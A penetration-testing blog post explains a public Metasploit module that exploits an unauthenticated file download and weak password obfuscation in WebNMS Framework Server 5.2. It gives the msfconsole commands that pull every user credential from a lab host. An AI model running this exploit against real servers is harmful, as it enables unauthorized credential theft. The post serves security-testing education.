Pages

  • Home
  • Author
skip to main | skip to sidebar

Hacking Articles|Raj Chandel's Blog

RSS Feed

Gather Credential of WebNMS Framework Server using Metasploit

at 9:13 AM Thursday, July 21, 2016
This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract all user credentials. The first vulnerability is a unauthenticated file download in the FetchFile servlet, which is used to download the file containing the user credentials. The second vulnerability is that the the passwords in the file are obfuscated with a very weak algorithm which can be easily reversed. This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on Windows and Linux.

Exploit Targets
WebNMS Framework Server 5.2

Requirement
Attacker: kali Linux
Victim PC: WebNMS Framework Server 5.2


Open Kali terminal type msfconsole


Now type use auxiliary/admin/http/webnms_cred_disclosure
msf exploit (webnms_cred_disclosure)>set rhost 192.168.0.103 (IP of Remote Host)
msf exploit (webnms_cred_disclosure)>set rport 9090
msf exploit (webnms_cred_disclosure)>exploit           

Labels: Kali Linux, Penetration Testing

0 comments:

Post a Comment

Newer Post Older Post Home
Subscribe to: Post Comments (Atom)

Labels

  • Batch File tricks (8)
  • crytography (3)
  • CTF (100)
  • Cyber Forensics Tools (56)
  • DLL Hacking (6)
  • footprinting (2)
  • Google Hacking (1)
  • Hacking Tools (12)
  • Kali Linux (371)
  • others (5)
  • Penetration Testing (1309)
  • redteam (9)
  • Stegnography (7)
  • Windows Hacking (6)

Popular Posts

  • 64-bit Linux Assembly and Shellcoding
    Introduction Shellcodes are machine instructions that are used as a payload in the exploitation of a vulnerability. An exploit is a small ...
  • GreatSct - An Application Whitelist Bypass Tool
    While wrting Applocker bypass series , we found a new tool which was especially design for bypassing whitelisting application.  So Idecid...
  • Abusing AD-DACL : Generic ALL Permissions
      In this post, we explore the exploitation of Discretionary Access Control Lists (DACL) using the Generic ALL permission in Active Director...
  • MSSQL for Pentester: NetExec
    NetExec (nxc) is a powerful network exploitation tool developed as a modern successor to CrackMapExec (CME), which was widely used by penetr...
  • Credential Dumping: AD User Comment
    In this article, we shall explore different tools & techniques that help us enumerate Active Directory (AD) users' passwords using w...
  • Diamond Ticket Attack: Abusing kerberos Trust
    The Diamond Ticket attack represents a sophisticated escalation in Active Directory (AD) exploitation methods, leveraging intricate flaws in...
  • Active Directory Pentesting Using Netexec Tool: A Complete Guide
    Active Directory (AD) penetration testing is an essential part of the security assessment of enterprise networks. The Netexec tool offers a...
  • Shadow Credentials Attack
    In this post, we explore the exploitation technique known as the Shadow Credentials attack. This attack leverages the mismanagement or explo...
  • Credential Dumping: GMSA
    Abusing AD-DACL: ReadGMSAPassword ReadGMSAPassword Attack is a technique where attackers abuse misconfigured Group Managed Service Account...
  • Abusing AD Weak Permission Pre2K Compatibility
    Pre2K (short for "Pre-Windows 2000") Active Directory misconfigurations often stem from overlooked legacy settings in Windows en...
 

Copyright 2010 Hacking Articles|Raj Chandel's Blog. Theme zBench Bloggerized by Who Got Eliminated for Sports Master

Δ Top